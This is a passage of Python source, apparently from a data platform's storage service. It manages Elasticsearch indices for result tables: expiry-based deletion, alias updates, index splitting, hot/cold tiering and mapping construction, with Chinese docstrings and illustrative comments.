if rt_info and ES in rt_info[STORAGES]:
rt_es_cluster_name = rt_info[STORAGES][ES][STORAGE_CLUSTER][CLUSTER_NAME]
if rt_es_cluster_name != es_cluster_name:
logger.warning(
f"{es_addr}: rt es cluster changed to {rt_es_cluster_name}, unable to maintain "
f"{json.dumps(sort_index_list)}"
)
else:
_maintain_rt_indices(rt_info, sort_index_list, es_addr, es_auth)
else:
                # if the ES storage was removed from the rt, this orphaned data would otherwise never be deleted
raise RtStorageNotExistsError(message_kv={RESULT_TABLE_ID: rt_id_lower, TYPE: ES})
except Exception:
logger.warning(f"{es_addr}: failed to maintain indices {json.dumps(sort_index_list)}.", exc_info=True)
maintain_failed.append(sort_index_list)
logger.info(
f"{es_addr}: es maintain finished for {len(list(valid_rt_indices.keys()))} rts, failed are "
f"{json.dumps(maintain_failed)}"
)
def _maintain_rt_indices(rt_info, sort_index_list, es_addr, es_auth):
"""
维护rt对应的索引列表
:param rt_info: rt的配置信息
:param sort_index_list: rt的es索引列表,倒序排列
:param es_addr: es集群地址
:param es_auth: es鉴权信息
:return: 维护结果
"""
rt_id_lower = rt_info[RESULT_TABLE_ID].lower()
logger.info(f"{es_addr}: going to maintain indices {json.dumps(sort_index_list)}")
    # keep at least one index, delete every index past its expiry time, and maintain the index aliases
indices_to_delete = _expired_index_list(rt_id_lower, rt_info[STORAGES][ES][EXPIRES], sort_index_list)
if indices_to_delete:
logger.info(f"{es_addr}: going to delete indices {json.dumps(indices_to_delete)}")
_delete_index(es_addr, es_auth, ",".join(indices_to_delete))
    # decide whether the index needs to be split (500 GB, or 7 days old, or docs over the limit)
max_index_name = sort_index_list[0]
index_size = _get_index_size(es_addr, es_auth, max_index_name)
    # regardless of whether a split is needed, point today's alias at the current largest index, since part of today's logs have already been written to it
_alias_update(es_addr, es_auth, rt_id_lower, max_index_name)
conn_info = rt_info[STORAGES][ES][STORAGE_CLUSTER][CONNECTION_INFO]
shard, init_shard_size, max_shard_num, shard_docs_limit, total_shards_per_node = _get_init_shard_param(conn_info)
    # get the index's primary shard count and doc count
pri_shard_num, docs = _get_es_index_pri_docs(es_addr, es_auth, max_index_name)
if _index_need_splitting(max_index_name, index_size, conn_info, pri_shard_num, docs, shard_docs_limit):
new_index_name = _get_new_index_name(rt_id_lower, max_index_name)
num_shards = shard if index_size < init_shard_size else max_shard_num
mapping = _construct_mapping(rt_info, num_shards, TAG_HOT, total_shards_per_node)
logger.info(f"{es_addr}: {rt_id_lower} create index {new_index_name} with mapping {mapping}")
        # create the index and attach the aliases
_create_es_index_in_cluster(rt_id_lower, es_addr, es_auth, new_index_name, mapping)
    # the overseas edition has no cold nodes while the internal edition has both hot and cold nodes; a flag distinguishes the editions
    if _get_has_cold_nodes(conn_info):
        # move aged indices onto the cold nodes
cold_sort_index_list = sort_index_list[1:]
hot_index_date = util.get_date_by_diff(1 - _get_hot_save_days(conn_info)) # yyyyMMdd
for one_index in cold_sort_index_list:
            # keep today's index (suffix yyyyMMdd01) unchanged and skip moving it to the cold nodes
if one_index in indices_to_delete or int(hot_index_date) <= int(one_index.split("_")[-1][0:8]):
continue
else:
allocation_tag = _get_index_allocation_tag(es_addr, es_auth, one_index)
                # change the index's tag to cold if it is not cold already
if allocation_tag != TAG_COLD:
logger.info(f"{es_addr}: going to move index {one_index} to cold tag")
                    # set the per-node shard limit for cold nodes
settings = {
"index.routing.allocation.include.tag": TAG_COLD,
"index.routing.allocation.total_shards_per_node": (REPLICA_NUM + 1) * max_shard_num,
}
_put_index_settings(es_addr, es_auth, one_index, settings)
def _create_es_index_in_cluster(rt, es_addr, es_auth, index_name, index_mapping_str):
"""
在es集群中创建索引
:param rt: rt名称
:param es_addr: es集群地址
:param es_auth: es集群鉴权
:param index_name: 索引名称
:param index_mapping_str: 索引的mapping
:return: 是否创建成功
"""
res = requests.put(
url=f"http://{es_addr}/{index_name}?master_timeout=240s",
json=json.loads(index_mapping_str),
headers=JSON_HEADERS,
auth=es_auth,
timeout=600,
)
if res.status_code == 200:
alias = rt.lower()
        # TODO: verify that the index now exists and can be queried through the REST API
if _alias_update(es_addr, es_auth, alias, index_name):
            # alias updates are asynchronous, so verify that the alias really points at the new index, waiting up to 90s
reties = 15
while not _is_alias_point_to_index(es_addr, es_auth, alias, index_name) and reties > 0:
time.sleep(6)
reties -= 1
if reties == 0:
_delete_index(es_addr, es_auth, index_name)
logger.warning(f"{es_addr}: update alias timeout for {rt}, delete the index {index_name}")
else:
logger.info(f"{es_addr}: create index {index_name} and update alias success for {rt}")
return True
else:
_delete_index(es_addr, es_auth, index_name)
logger.warning(f"{es_addr}: update alias failed for {rt}, delete the index {index_name}")
else:
        # creating the ES mapping failed, so raise an alert
msg = f"{es_addr}: failed to create index {index_name} for {rt}. {res.status_code} {res.text}"
logger.warning(msg)
util.wechat_msg(RTX_RECEIVER, msg)
return False
def _alias_update(es_addr, es_auth, alias, max_index_name):
"""
获取别名(rt)指向的index名称和当日alias指向的index名称,如果和传入的索引相同,则无需修改别名
:param es_addr: es集群地址
:param es_auth: es鉴权信息
:param alias: es索引的默认别名
:param max_index_name: 当前最大的索引名称
:return: 更新别名的结果,True/False
"""
today = alias + "_" + util.get_date_by_diff(0)
tomorrow = alias + "_" + util.get_date_by_diff(1)
near_tomorrow = util.is_near_tomorrow()
    # if we are close to midnight, also add tomorrow's date as an alias
if near_tomorrow:
alias_ret = requests.get(
url=f"http://{es_addr}/_alias/{alias},{today},{tomorrow}",
auth=es_auth,
timeout=HTTP_REQUEST_TIMEOUT,
)
else:
alias_ret = requests.get(
url=f"http://{es_addr}/_alias/{alias},{today}", auth=es_auth, timeout=HTTP_REQUEST_TIMEOUT
)
action = {ACTIONS: []}
    # inspect the index's current aliases and add any that are missing
if alias_ret.status_code == 200 and max_index_name in alias_ret.json():
alias_list = list(alias_ret.json()[max_index_name]["aliases"].keys())
if alias not in alias_list:
action[ACTIONS].append({REMOVE: {INDEX: f"{alias}_20*", ALIAS: alias}})
action[ACTIONS].append({ADD: {INDEX: max_index_name, ALIAS: alias}})
if today not in alias_list:
action[ACTIONS].append({ADD: {INDEX: max_index_name, ALIAS: today}})
if near_tomorrow and tomorrow not in alias_list:
action[ACTIONS].append({ADD: {INDEX: max_index_name, ALIAS: tomorrow}})
else:
action[ACTIONS].append({REMOVE: {INDEX: f"{alias}_20*", ALIAS: alias}})
action[ACTIONS].append({ADD: {INDEX: max_index_name, ALIAS: alias}})
action[ACTIONS].append({ADD: {INDEX: max_index_name, ALIAS: today}})
if near_tomorrow:
action[ACTIONS].append({ADD: {INDEX: max_index_name, ALIAS: tomorrow}})
if action[ACTIONS]:
action = json.dumps(action)
logger.info(f"{es_addr}: change alias for {max_index_name} {action}")
        # repoint the aliases in a single atomic operation
res = requests.post(
url=f"http://{es_addr}/_aliases?master_timeout=240s",
data=action,
headers=JSON_HEADERS,
auth=es_auth,
timeout=600,
)
if res.status_code != 200:
logger.warning(f"{es_addr}: change alias failed {action}. {res.status_code} {res.text}")
return False
return True
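# Illustrative example (added): a typical actions payload that _alias_update() posts to the standard
# Elasticsearch /_aliases endpoint for an index named 591_etl_abc_2021080200 (names are made up):
#
#   {"actions": [
#       {"remove": {"index": "591_etl_abc_20*", "alias": "591_etl_abc"}},
#       {"add": {"index": "591_etl_abc_2021080200", "alias": "591_etl_abc"}},
#       {"add": {"index": "591_etl_abc_2021080200", "alias": "591_etl_abc_20210802"}}
#   ]}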
def _is_alias_point_to_index(es_addr, es_auth, alias, index_name):
"""
验证es中的别名是否指向指定的索引,返回验证结果
:param es_addr: es集群地址
:param es_auth: es权限校验信息
:param alias: 索引的别名
:param index_name: 索引名称
:return: True/False
"""
res = requests.get(url=f"http://{es_addr}/_alias/{alias}", auth=es_auth, timeout=HTTP_REQUEST_TIMEOUT)
    # first check that the response contains exactly one key, then that this key equals the index name; only then does the alias point at the index, and at it alone
if res.status_code == 200:
result = res.json()
if len(result) == 1 and index_name in result:
return True
logger.warning(f"{es_addr}: alias {alias} is not point to index {index_name}. {res.status_code}, {res.text}")
return False
def _delete_index(es_addr, es_auth, indices):
"""
删除es集群中的指定索引
:param es_addr: es集群地址
:param es_auth: es权限校验信息
:param indices: 索引名称,多个索引用逗号串起来
:return: 删除成功与否,True/False
"""
res = requests.delete(f"http://{es_addr}/{indices}", auth=es_auth, timeout=600)
if res.status_code == 200:
return True
else:
logger.warning(f"{es_addr}: failed to delete indices {indices}. {res.status_code} {res.text}")
return False
def _get_valid_rt_indices(indices):
"""
在输入的索引列表中找到合法的rt和rt对应的索引列表(倒序,最新时间的索引名称在前)。
:param indices: 索引名称列表
:return: 元组,第一个是rt和对应的索引列表的字典,第二个是不合法的索引列表
"""
rt_sort_index_list = {}
bad_indices = []
for index_name in indices:
        # a valid index looks like 611_etl_docker_2018070700: rt_id + _ + yyyyMMdd + xx (the xx sequence number is optional and defaults to 00)
if re.search(r"^\d+_\w+_\d{8,}$", index_name) is None:
            # the name does not match, so this is not an index written by the ES loader
skip = False
for prefix in SKIP_ES_INDEX_PREFIX:
if index_name.startswith(prefix):
skip = True
break
if not skip:
bad_indices.append(index_name)
else:
rt = "_".join(index_name.split("_")[0:-1])
if rt not in rt_sort_index_list:
rt_sort_index_list[rt] = [index_name]
else:
rt_sort_index_list[rt].append(index_name)
for index_name_list in list(rt_sort_index_list.values()):
index_name_list.sort(reverse=True)
return rt_sort_index_list, bad_indices
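# Illustrative example (added): given indices like ["591_etl_abc_2019061400", "591_etl_abc_2019052900",
# "some_system_index"], _get_valid_rt_indices() would return
# ({"591_etl_abc": ["591_etl_abc_2019061400", "591_etl_abc_2019052900"]}, ["some_system_index"]),
# assuming "some_system_index" does not start with any SKIP_ES_INDEX_PREFIX entry.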
def _get_es_indices(es_addr, es_auth, index_prefix=""):
"""
获取es集群中符合匹配规则的所有正常的索引列表,不包含状态为closed的索引。
:param es_addr: es集群地址
:param es_auth: es集群的鉴权信息
:param index_prefix: 检索的es索引的前缀,默认为空字符串
:return: es集群中正常的索引列表
"""
res = requests.get(
f"http://{es_addr}/_cat/indices?h=index,status&format=json&index={index_prefix}*",
auth=es_auth,
timeout=HTTP_REQUEST_TIMEOUT,
)
indices = []
not_open_indices = []
if res.status_code == 200:
for item in res.json():
if item[STATUS] == "open":
indices.append(item[INDEX])
else:
not_open_indices.append(item[INDEX])
else:
logger.warning(f"{es_addr}: get indices list failed. {res.status_code} {res.text}")
if not_open_indices:
logger.info(f"{es_addr}: not open indices are {json.dumps(not_open_indices)}")
return indices
def _get_es_index_pri_docs(es_addr, es_auth, index_name):
"""
获取es集群中索引的docs。
:param es_addr: es集群地址
:param es_auth: es集群的鉴权信息
:param index_name: 索引名称
:return: es集群中索引的docs。
"""
res = requests.get(
f"http://{es_addr}/_cat/indices/{index_name}?v&s=index&format=json",
auth=es_auth,
timeout=HTTP_REQUEST_TIMEOUT,
)
docs = 0
pri_shard_num = 0
if res.status_code == 200 and res.json():
docs = int(res.json()[0]["docs.count"])
pri_shard_num = int(res.json()[0]["pri"])
else:
logger.warning(f"{es_addr}: get index docs failed. {res.status_code} {res.text}")
return pri_shard_num, docs
def _trans_fields_to_es_conf(fields, es_storage_conf):
"""
将rt的字段转换为es中的字段和类型
:param fields: rt中的字段列表
:param es_storage_conf: rt的es相关存储配置
:return: es中的mapping相关配置
"""
# 页面上配置支持分词字段、聚合字段、json字段三种配置。时间字段为默认的,用户不可配置。
result_conf = {
ANALYZED_FIELDS: [],
        DATE_FIELDS: [DTEVENTTIMESTAMP], # the date field is not user configurable
        DOC_VALUES_FIELDS: [DTEVENTTIMESTAMP], # the timestamp is always an aggregation (doc_values) field
JSON_FIELDS: [],
}
    # by default drop the rt's timestamp/offset fields, add the _iteration_idx field, and map the fields to their ES configuration
for field in fields:
field_name = field[FIELD_NAME]
if field_name not in SKIP_RT_FIELDS:
            # TODO: analyzed_fields (tokenized) and doc_values_fields (aggregatable) should be mutually exclusive; keyword supports aggregation, text does not
if ANALYZED_FIELDS in es_storage_conf and field_name in es_storage_conf[ANALYZED_FIELDS]:
result_conf[ANALYZED_FIELDS].append(field_name)
if JSON_FIELDS in es_storage_conf and field_name in es_storage_conf[JSON_FIELDS]:
result_conf[JSON_FIELDS].append(field_name)
if (
field_name != DTEVENTTIMESTAMP
and DOC_VALUES_FIELDS in es_storage_conf
and field_name in es_storage_conf[DOC_VALUES_FIELDS]
):
result_conf[DOC_VALUES_FIELDS].append(field_name)
    # TODO: keep the legacy behaviour of always treating a few fields as aggregation fields; this should eventually move into the ES storage configuration
for field_name in AUTO_CREATE_FIELD:
if field_name not in result_conf[DOC_VALUES_FIELDS]:
result_conf[DOC_VALUES_FIELDS].append(field_name)
return result_conf
def _trans_mapping_to_es_conf(es_mapping, es_version):
"""
将es索引的mapping转换为es存储的配置,以便于和rt的es存储配置对比。
:param es_mapping: es索引的mapping,json对象
:return: 索引的mapping转换的es存储的配置对象
"""
result_conf = {ANALYZED_FIELDS: [], DATE_FIELDS: [], DOC_VALUES_FIELDS: [], JSON_FIELDS: []}
for field_name, value in list(es_mapping[PROPERTIES].items()):
if field_name == "_copy" and _extract_big_version(es_version) >= 6:
            # skip the _copy field added by default on 6.x; it plays the role of the _all field from older versions
continue
if PROPERTIES in value or value[TYPE] == OBJECT:
            # json fields can be neither analyzed nor aggregated
result_conf[JSON_FIELDS].append(field_name)
continue
if value[TYPE] == TEXT:
            # text fields are the analyzed fields and cannot be used for aggregation
result_conf[ANALYZED_FIELDS].append(field_name)
else:
if DOC_VALUES not in value:
                # doc_values defaults to true and only shows up in the mapping when explicitly set to false
result_conf[DOC_VALUES_FIELDS].append(field_name)
if value[TYPE] == DATE:
result_conf[DATE_FIELDS].append(field_name)
    # TODO: keep the legacy behaviour of always treating a few fields as aggregation fields; this should eventually move into the ES storage configuration
for field_name in AUTO_CREATE_FIELD:
if field_name not in result_conf[DOC_VALUES_FIELDS]:
result_conf[DOC_VALUES_FIELDS].append(field_name)
return result_conf
def _is_schema_changed(rt_info, json_mapping):
"""
根据rt的es存储配置计算es的mapping内容,和实际es集群中此rt对应的索引的mapping进行对比,返回对比结果
:param rt_info: rt的配置
:param json_mapping: rt对应es中索引的mapping
:return: 是否rt对应的mapping发生了变化,True/False
"""
config_from_api = json.loads(rt_info[STORAGES][ES][STORAGE_CONFIG])
rt_es_config = _trans_fields_to_es_conf(rt_info[FIELDS], config_from_api)
# from ES
version = rt_info[STORAGES][ES][STORAGE_CLUSTER][VERSION]
    index_type = rt_info[RESULT_TABLE_NAME].lower() # index_type is the rt's result_table_name field
properties = json_mapping if _extract_big_version(version) >= 7 else json_mapping[index_type]
es_config = _trans_mapping_to_es_conf(properties, version)
result = not _is_subset(rt_es_config, es_config)
logger.info(
f"{rt_info[RESULT_TABLE_ID]} es storage config changed is {result}. from rt conf/from es "
f"index: {json.dumps(rt_es_config)}, {json.dumps(es_config)}"
)
return result
def _is_replica_changed(rt_info, current_replica):
"""
根据rt的es存储配置中副本设置和实际索引中副本设置进行对比,返回是否副本设置相同
:param rt_info: rt的配置
:param current_replica: 当前索引的副本数量
:return: 是否rt对应的副本设置发生了变化,True/False
"""
config_from_api = json.loads(rt_info[STORAGES][ES][STORAGE_CONFIG])
num_replica = _get_replica_num(rt_info[STORAGES][ES][STORAGE_CLUSTER][CONNECTION_INFO], config_from_api)
return num_replica != current_replica
def _get_replica_num(conn_info, es_conf):
"""
根据rt的es存储配置,以及配置文件中的配置,返回es存储的副本数
:param conn_info: es集群配置
:param es_conf: es配置项
:return: es存储的副本数
"""
conn = json.loads(conn_info)
num_replica = 0
if (
ENABLE_REPLICA in conn
and type(conn[ENABLE_REPLICA]) == bool
and conn[ENABLE_REPLICA]
and HAS_REPLICA in es_conf
and type(es_conf[HAS_REPLICA]) == bool
and es_conf[HAS_REPLICA]
):
        # only set index replicas when the cluster enables replicas and the rt's storage configuration asks for them
num_replica = REPLICA_NUM
return num_replica
def _construct_mapping(rt_info, num_shard, index_tag, total_shards_per_node=TOTAL_SHARDS_PER_NODE):
"""
构造rt对应的es索引的mapping
:param rt_info: rt的配置
:param num_shard: es索引的分片数
:param index_tag: es索引的tag
:param total_shards_per_node: es索引单节点最大分片数
:return: rt对应的es索引的mapping字符串
"""
config_from_api = json.loads(rt_info[STORAGES][ES][STORAGE_CONFIG])
num_replica = _get_replica_num(rt_info[STORAGES][ES][STORAGE_CLUSTER][CONNECTION_INFO], config_from_api)
rt_es_config = _trans_fields_to_es_conf(rt_info[FIELDS], config_from_api)
version = rt_info[STORAGES][ES][STORAGE_CLUSTER][VERSION]
    # field used by ES 6.x
copy_to_field_name = "_copy"
mapping_field_dict = {}
rt_field_dict = {}
for field_name, field_type in list(_trans_rt_fields(rt_info[FIELDS]).items()):
rt_field_dict[field_name] = field_type
mapping_dict_value = {}
if _extract_big_version(version) < 6:
mapping_dict_value[INCLUDE_IN_ALL] = FALSE
        # analyzed, json and aggregation fields are mutually exclusive
if field_name in rt_es_config[ANALYZED_FIELDS]:
mapping_dict_value[TYPE] = TEXT
mapping_dict_value[DOC_VALUES] = FALSE
if _extract_big_version(version) >= 6:
mapping_dict_value["copy_to"] = copy_to_field_name
else:
mapping_dict_value[INCLUDE_IN_ALL] = TRUE
elif field_name in rt_es_config[JSON_FIELDS]:
mapping_dict_value[TYPE] = OBJECT
elif field_name in rt_es_config[DOC_VALUES_FIELDS]:
mapping_dict_value[TYPE] = _convert_to_es_type(field_type)
else:
            # ordinary field, mark it as non-aggregatable
mapping_dict_value[TYPE] = _convert_to_es_type(field_type)
mapping_dict_value[DOC_VALUES] = FALSE
        # handle the date fields
if field_name in rt_es_config[DATE_FIELDS]:
mapping_dict_value[TYPE] = DATE
mapping_dict_value["format"] = (
"yyyy-MM-dd HH:mm:ss"
if field_name == DTEVENTTIME
else "epoch_millis"
if field_name == DTEVENTTIMESTAMP
else "strict_date_optional_time||yyyy-MM-dd HH:mm:ss||epoch_millis"
)
        # add the field to the mapping
mapping_field_dict[field_name] = mapping_dict_value
logger.info(
f"{rt_info[RESULT_TABLE_ID]}: rt fields {json.dumps(rt_field_dict)}, "
f"mapping fields {json.dumps(mapping_field_dict)}"
)
    index_type = rt_info[RESULT_TABLE_NAME].lower() # index_type is the rt's result_table_name field
    # Per-node shard cap: with replicas and little data the shards may cluster on a few nodes, but by default there are only 3 shards anyway.
    # For large indices the cap must be >= the number of hot nodes (otherwise shards may be unassignable when replicas exist), and the per-node cap per index is the default shard count times the replica factor.
    # total_shards_per_node defaults to 2 to keep shards assignable when a node fails.
index_mapping = {SETTINGS: {INDEX: {"number_of_shards": f"{num_shard}", NUMBER_OF_REPLICAS: f"{num_replica}"}}}
if NODE_HAS_TAG:
index_mapping[SETTINGS][INDEX][ROUTING] = {ALLOCATION: {INCLUDE: {TAG: f"{index_tag}"}}}
        # only enabled in the internal edition
if RUN_VERSION == VERSION_IEOD_NAME:
index_mapping[SETTINGS][INDEX][ROUTING][ALLOCATION]["total_shards_per_node"] = (
total_shards_per_node + num_replica
)
dynamic_templates = [
{"strings_as_keywords": {"match_mapping_type": STRING, "mapping": {"norms": FALSE, TYPE: KEYWORD}}}
]
if _extract_big_version(version) >= 7:
index_mapping[MAPPINGS] = {"dynamic_templates": dynamic_templates}
else:
index_mapping[MAPPINGS] = {f"{index_type}": {"dynamic_templates": dynamic_templates}}
    # for ES 6.x the mapping differs from older versions (mostly 5.x)
if _extract_big_version(version) >= 6:
mapping_field_dict[copy_to_field_name] = {TYPE: TEXT}
else:
index_mapping[MAPPINGS][index_type]["_all"] = {"enabled": TRUE}
if _extract_big_version(version) >= 7:
index_mapping[MAPPINGS][PROPERTIES] = mapping_field_dict
else:
index_mapping[MAPPINGS][index_type][PROPERTIES] = mapping_field_dict
return json.dumps(index_mapping)
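# Illustrative example (added): for an ES 7.x cluster with NODE_HAS_TAG enabled, _construct_mapping()
# produces a JSON string shaped roughly like the following (field names and counts are made up):
#
#   {"settings": {"index": {"number_of_shards": "3", "number_of_replicas": "0",
#                           "routing": {"allocation": {"include": {"tag": "hot"}}}}},
#    "mappings": {"dynamic_templates": [{"strings_as_keywords": {"match_mapping_type": "string",
#                                        "mapping": {"norms": "false", "type": "keyword"}}}],
#                 "properties": {"dteventtimestamp": {"type": "date", "format": "epoch_millis"},
#                                "log": {"type": "text", "doc_values": "false", "copy_to": "_copy"},
#                                "_copy": {"type": "text"}}}}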
def _get_index_mapping_from_es(es_addr, es_auth, index):
"""
获取es中索引的mapping信息
:param es_addr: es集群地址
:param es_auth: es鉴权信息
:param index: 索引名称
:return: es索引的mapping信息
"""
res = requests.get(f"http://{es_addr}/{index}/_mappings", auth=es_auth, timeout=HTTP_REQUEST_TIMEOUT)
if res.status_code == 200:
return res.json()[index][MAPPINGS]
else:
logger.warning(f"{es_addr}: get index {index} mappings failed. {res.status_code} {res.text}")
raise EsRestRequestError(message_kv={"msg": res.text})
def _get_index_settings_from_es(es_addr, es_auth, index):
"""
获取es索引的settings设置
:param es_addr: es集群地址
:param es_auth: es鉴权信息
:param index: 索引名称
:return: es索引的settings设置
"""
res = requests.get(f"http://{es_addr}/{index}/_settings", auth=es_auth, timeout=HTTP_REQUEST_TIMEOUT)
if res.status_code == 200:
return res.json()
else:
logger.warning(f"{es_addr}: get index {index} settings failed. {res.status_code} {res.text}")
raise EsRestRequestError(message_kv={"msg": res.text})
def _get_sample_data_from_es(es_addr, es_auth, index):
"""
从指定索引中查找最新的十条数据并返回
:param es_addr: es集群地址
:param es_auth: es鉴权信息
:param index: 索引名称
:return: es索引中的最新十条数据
"""
res = requests.post(
f"http://{es_addr}/{index}/_search/",
auth=es_auth,
headers=JSON_HEADERS,
data=json.dumps({"sort": [{DTEVENTTIMESTAMP: {ORDER: "desc"}}], "from": 0, "size": 10}),
)
if res.status_code == 200:
return res.json()
else:
logger.warning(f"{es_addr}: query index {index} failed. {res.status_code} {res.text}")
return {}
def _is_subset(small_conf_dict, big_conf_dict):
"""
判断一个配置集是否为另一个配置集的子集,如果是,返回True,否则返回False
:param small_conf_dict: 较小的配置集对象
:param big_conf_dict: 较大的配置集对象
:return: True/False
"""
for key, value_list in list(small_conf_dict.items()):
if key not in list(big_conf_dict.keys()):
return False
else:
for value in value_list:
if value not in big_conf_dict[key]:
return False
return True
def _get_new_index_name(rt, max_index_name=None):
"""
构造es中rt对应的最新索引名称
:param rt: result table id
:param max_index_name: es中此rt对应的最大的索引名称
:return: rt最新的索引名称
"""
today = util.get_date_by_diff(0) # in case of 20180132 -> 20180201
index_name = f"{rt}_{today}00" # 默认索引名称为rt + _ + 当前日期 + 00
if max_index_name:
index_date_num = max_index_name.split("_")[-1]
        if today in index_date_num: # the current largest index was created today, so bump the last two digits by one
index_name = f"{rt}_{int(index_date_num) + 1}"
    return index_name.lower() # ES index names must be lowercase
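# Illustrative example (added): with today == "20210803", _get_new_index_name("591_etl_abc") returns
# "591_etl_abc_2021080300"; if the current largest index is "591_etl_abc_2021080300" (already created
# today), the next call returns "591_etl_abc_2021080301".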
def _trans_rt_fields(fields):
"""
将rt的字段列表转换为在es中的字段列表
:param fields: rt的字段列表
:return: es中的字段列表,包含字段名称和类型
"""
result = {DTEVENTTIMESTAMP: DATE}
for field in fields:
if field[FIELD_NAME] not in SKIP_RT_FIELDS:
result[field[FIELD_NAME]] = field[FIELD_TYPE]
return result
def _convert_to_es_type(field_type):
"""
将rt的字段类型映射为es中的数据类型
:param field_type: rt的字段类型
:return: es中的数据类型
"""
if INT == field_type:
return INTEGER
elif field_type in [LONG, FLOAT, DOUBLE]:
return field_type
else:
return KEYWORD
def _expired_index_list(result_table_id, expires, index_name_list):
"""
从index列表中获取待删除的index,这里要列表类似[rt_2019061400, rt_2019060600, rt_2019052900],其中0529存储的
是0529~0606的数据,清理时需要0606达到过期时间,并删除0529,不能看到0529已到清理时间就直接清除掉。
:param result_table_id: rt的id
:param expires: rt的过期时间配置
:param index_name_list: rt的索引列表,倒序排列。
:return: 需要删除的索引的列表
"""
expired_index_name_list = []
length = len(index_name_list)
days = util.translate_expires_day(expires)
if length <= RESERVED_INDEX_NUM or days <= 0:
return expired_index_name_list
expired_date = int(util.get_date_by_diff(-days))
suffix_idx = len(result_table_id) + 1
for i in range(length):
        # take the date part at the end of the index name (591_etl_abc_2018090202 -> 2018090202; the last segment could also be 0)
date_suffix = index_name_list[i][suffix_idx:]
if len(date_suffix) < 8:
            # invalid index name
expired_index_name_list.append(index_name_list[i])
elif int(date_suffix[0:8]) < expired_date:
            # idx is the position right after the first index whose creation date is older than expired_date, i.e. where deletion starts
idx = max(i + 1, RESERVED_INDEX_NUM)
expired_index_name_list.extend(index_name_list[idx:])
break
logger.debug(f"{result_table_id}: indices expired are {json.dumps(expired_index_name_list)}")
return expired_index_name_list
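# Illustrative example (added): with expires translating to 7 days, today == 20190615 and
# index_name_list == ["rt_2019061400", "rt_2019060600", "rt_2019052900"], the cutoff is 20190608.
# rt_2019060600 is the first index created before the cutoff; its data extends up to the creation of
# the next index, so it is kept, and everything after it (["rt_2019052900"]) is returned for deletion,
# assuming RESERVED_INDEX_NUM is at most 2.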
def _index_need_splitting(index, index_size, connection_info, pri_shard_num, docs, shard_docs_limit):
"""
获取是否需要强制分裂当前的索引
现在的分裂条件判断过程:
1)index 为空不分裂
2)docs数超出限制,分裂
3)字节总量index size超过限制,分裂
4)index不为空,且超出分裂日期,分裂
5) 其他情况不分裂
:param index: 索引名称
:param index_size: 索引的字节数
:param connection_info: 连接信息
:param pri_shard_num: 主分片数据
:param docs: index docs
:param shard_docs_limit: 单分片docs限制
:return: 是否需要分裂索引
"""
if docs == 0:
return False
index_split_threshold_in_byte, force_split_days = _get_split_index_condition(connection_info)
index_date = int(index.split("_")[-1][0:8])
force_split_date = int(util.get_date_by_diff(-force_split_days))
if (
docs >= pri_shard_num * shard_docs_limit
or index_size >= index_split_threshold_in_byte
or force_split_date >= index_date
):
return True
return False
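# Illustrative example (added): assuming shard_docs_limit == 20_000_000, pri_shard_num == 3,
# index_split_threshold_in_byte == 500 GB and force_split_days == 7 (the real limits come from the
# cluster settings), an index holding 70,000,000 docs is split because 70M >= 3 * 20M, even if it is
# smaller than 500 GB and younger than 7 days.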
def _get_index_size(es_addr, es_auth, index):
"""
获取当前索引的字节数
:param es_addr: es集群地址
:param es_auth: es鉴权信息
:param index: 索引名称
:return: 索引包含的字节数
"""
res = requests.get(f"http://{es_addr}/{index}/_stats/store", auth=es_auth, timeout=HTTP_REQUEST_TIMEOUT)
if res.status_code == 200:
try:
return res.json()[INDICES][index]["primaries"]["store"]["size_in_bytes"]
except Exception:
logger.info(f"{es_addr}: failed to get index {index} size. ", exc_info=True)
else:
logger.warning(f"{es_addr}: failed to get {index} stats. {res.status_code} {res.text}")
return 0
def _get_index_allocation_tag(es_addr, es_auth, index):
"""
获取es索引中allocation tag配置项的值
:param es_addr: es集群地址
:param es_auth: es鉴权信息
:param index: 索引名称
:return: allocatoin tag的值
"""
tag = TAG_HOT # 假定获取失败时,使用热节点的tag
es_settings = _get_index_settings_from_es(es_addr, es_auth, index)
try:
tag = es_settings[index][SETTINGS][INDEX][ROUTING][ALLOCATION][INCLUDE][TAG]
except Exception:
logger.error(
f"{es_addr}: failed to get {index} allocation tag from settings {json.dumps(es_settings)}.",
exc_info=True,
)
return tag
def _get_index_replica(es_addr, es_auth, index):
"""
获取es索引中number_of_replicas配置项的值
:param es_addr: es集群地址
:param es_auth: es鉴权信息
:param index: 索引名称
:return: number_of_replicas的值
"""
replica = REPLICA_NUM # 假定获取失败时,使用默认副本设置
es_settings = _get_index_settings_from_es(es_addr, es_auth, index)
try:
replica = int(es_settings[index][SETTINGS][INDEX][NUMBER_OF_REPLICAS])
except Exception:
logger.error(
f"{es_addr}: failed to get {index} number_of_replicas from settings {json.dumps(es_settings)}.",
exc_info=True,
)
return replica
def _put_index_settings(es_addr, es_auth, index, put_dict):
"""
更新es索引的settings中配置项
:param es_addr: es集群地址
:param es_auth: es鉴权信息
:param index: 索引名称
:param put_dict: 更新的配置项字典
"""
url = f"http://{es_addr}/{index}/_settings?master_timeout=240s"
res = requests.put(url, data=json.dumps(put_dict), headers=JSON_HEADERS, auth=es_auth, timeout=600)
if res.status_code != 200:
logger.warning(f"{es_addr}: failed to update index {index} settings {put_dict}. {res.status_code} {res.text}")
def _extract_big_version(version):
"""
从给定的version中抽取大版本号,如:7.4.2 -> 7
:param version: 完整的版本号
:return: 数字类型的大版本号
"""
return int(version.split(".")[0])
def route_es_request(uri, cluster_name):
"""
:param uri: 请求相对路径
:param cluster_name: 集群名称
"""
cluster = model_manager.get_cluster_obj_by_name_type(cluster_name, ES)
if not cluster:
raise ClusterNotFoundException(message_kv={CLUSTER_TYPE: ES, CLUSTER_NAME: cluster_name})
es_addr, es_auth = parse_es_connection_info(cluster.connection_info)
url = f"http://{es_addr}/{uri}"
res = requests.get(url=url, auth=es_auth, timeout=HTTP_REQUEST_TIMEOUT)
logger.info(f"route es request, url: {url}, status: {res.status_code}")
if res.status_code == 200:
return res.text
else:
logger.warning(f"{es_addr}: route es request failed. {res.status_code} {res.text}")
raise EsRestRequestError(message_kv={"msg": res.text})
def cat_indices(cluster_name, limit):
"""
:param cluster_name: 集群名称
:param limit: 结果表限制数
"""
es_addr, es_auth = es_conn_info(cluster_name)
url = f"http://{es_addr}/_cat/indices?v&s={STORE_SIZE}:desc&format=json&master_timeout=300s"
res = requests.get(url=url, auth=es_auth, timeout=HTTP_REQUEST_TIMEOUT)
logger.info(f"cat indices request, url: {url}, status: {res.status_code}")
result = {TOP: [], INDICES: []}
if res.status_code == 200:
indices_list = res.json()
result[INDICES] = indices_list
        # filter out invalid index names, then take the top indices up to the limit
